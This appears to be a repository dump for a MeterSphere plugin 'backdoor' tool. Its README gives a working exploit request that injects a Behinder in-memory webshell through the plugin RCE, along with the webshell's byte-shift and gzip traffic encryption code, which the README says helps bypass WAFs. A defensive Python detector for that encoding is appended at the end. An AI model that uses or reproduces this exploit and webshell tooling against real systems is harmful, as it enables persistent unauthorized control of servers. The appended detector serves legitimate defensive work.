├── MeterSphere.jar
├── README.md
└── README
    ├── image-20231211142156295.png
    ├── image-20231211142834521.png
    ├── image-20231211143212494.png
    └── image-20231211143224759.png


/MeterSphere.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/MeterSphere.jar
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# MeterSphere-plugin-Backdoor
## 👮🏻‍♀️ Disclaimer

The user alone is responsible for **any direct or indirect consequences and losses** caused by distributing or using the **MeterSphere-plugin-Backdoor** tool; the author **accepts no liability for them**.

* Supports injecting an in-memory webshell and bypassing WAFs

#### Command execution

![image-20231211142156295](README/image-20231211142156295.png)

#### Injecting the in-memory webshell

* Pass the **Base64**-encoded string **inject** to inject the Behinder (冰蝎) in-memory webshell

```
POST /plugin/customMethod HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: MS_SESSION_ID=75407ecc-369b-48a7-ae80-d000f0d1b700
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 65

{
    "entry": "org.metersphere.Evil",
    "request": "aW5qZWN0"
}
```

* Behinder encryption function

```java
private byte[] Encrypt(byte[] data) {
    // Step 1: add 1 to every byte of the input.
    byte[] dt = new byte[data.length];
    for (int i = 0; i < data.length; i++) {
        dt[i] = (byte) (data[i] + 1);
    }
    try {
        // Step 2: gzip the shifted bytes.
        java.io.ByteArrayOutputStream o = new java.io.ByteArrayOutputStream();
        java.util.zip.GZIPOutputStream g = new java.util.zip.GZIPOutputStream(o);
        g.write(dt);
        g.close();
        byte[] c = o.toByteArray();
        byte[] ct = new byte[c.length];

        // Step 3: add 1 to every byte of the gzip stream.
        for (int i = 0; i < c.length; i++) {
            ct[i] = (byte) (c[i] + 1);
        }
        return ct;
    } catch (Exception ignored) {
    }
    // On any failure the input is returned unchanged.
    return data;
}
```

* Behinder decryption function

```java
private byte[] Decrypt(byte[] data) {
    // Step 1: subtract 1 from every byte to restore the gzip stream.
    byte[] dt = new byte[data.length];
    for (int i = 0; i < data.length; i++) {
        dt[i] = (byte) (data[i] - 1);
    }
    try {
        // Step 2: gunzip.
        java.io.ByteArrayInputStream t = new java.io.ByteArrayInputStream(dt);
        java.util.zip.GZIPInputStream i = new java.util.zip.GZIPInputStream(t, dt.length);
        byte[] c = r(i);
        byte[] ct = new byte[c.length];
        // Step 3: subtract 1 from every decompressed byte.
        for (int b = 0; b < c.length; b++) {
            ct[b] = (byte) (c[b] - 1);
        }
        return ct;
    } catch (Exception ignored) {
    }
    // On any failure the input is returned unchanged.
    return data;
}

// Reads the whole stream into a byte array.
private byte[] r(java.io.InputStream i) {
    byte[] temp = new byte[1024];
    java.io.ByteArrayOutputStream b = new java.io.ByteArrayOutputStream();
    int n;
    try {
        while ((n = i.read(temp)) != -1) {
            b.write(temp, 0, n);
        }
    } catch (Exception ignored) {
    }
    return b.toByteArray();
}
```

![image-20231211142834521](README/image-20231211142834521.png)

![image-20231211143212494](README/image-20231211143212494.png)

![image-20231211143224759](README/image-20231211143224759.png)

### References

https://github.com/vulhub/vulhub/tree/master/metersphere/plugin-rce

https://github.com/metersphere/metersphere/security/advisories/GHSA-mcwr-j9vm-5g8h

--------------------------------------------------------------------------------
/README/image-20231211142156295.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/README/image-20231211142156295.png
--------------------------------------------------------------------------------
/README/image-20231211142834521.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/README/image-20231211142834521.png
--------------------------------------------------------------------------------
/README/image-20231211143212494.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/README/image-20231211143212494.png
--------------------------------------------------------------------------------
/README/image-20231211143224759.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wafinfo/MeterSphere-plugin-Backdoor/8614a8b120c1e205c0432afac2571ac7990b0846/README/image-20231211143224759.png
--------------------------------------------------------------------------------
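
Added example for defenders, not part of this repository: the `Encrypt` function in the README above adds 1 to each byte, gzips the result, then adds 1 again, so every encoded body begins with the gzip magic `1f 8b 08` shifted to `20 8c 09`. The Python sketch below flags such bodies and reverses the layering for triage; the function names, the 1 MiB output cap and the sample bytes are assumptions constructed here.

```python
import gzip
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"   # gzip ID1, ID2, CM=deflate
MAX_OUTPUT = 1 << 20           # assumed cap against decompression bombs


def shift(data: bytes, delta: int) -> bytes:
    """Add delta to every byte modulo 256 (Java's (byte) cast wraps the same way)."""
    return bytes((b + delta) & 0xFF for b in data)


SHIFTED_MAGIC = shift(GZIP_MAGIC, 1)   # the fixed prefix of every encoded body


def looks_like_shifted_gzip(body: bytes) -> bool:
    """Cheap signature check usable in a proxy or log pipeline."""
    return body.startswith(SHIFTED_MAGIC)


def recover_plaintext(body: bytes, max_output: int = MAX_OUTPUT):
    """Reverse the README's layering (-1, gunzip, -1); None if it does not match."""
    if not looks_like_shifted_gzip(body):
        return None
    try:
        inflater = zlib.decompressobj(wbits=31)   # 31 = expect a gzip wrapper
        inner = inflater.decompress(shift(body, -1), max_output)
    except zlib.error:
        return None
    return shift(inner, -1)


# Constructed sample: harmless text run through the same layering as Encrypt().
SAMPLE_PLAINTEXT = b"constructed sample, not captured traffic"
SAMPLE_BODY = shift(gzip.compress(shift(SAMPLE_PLAINTEXT, 1)), 1)

if __name__ == "__main__":
    for name, body in [("sample", SAMPLE_BODY), ("json", b'{"a": 1}')]:
        print(name, looks_like_shifted_gzip(body), recover_plaintext(body))
```

Apply the check to the bytes left after any transport encoding such as Base64 is removed; how the body is wrapped on the wire is not stated on the page.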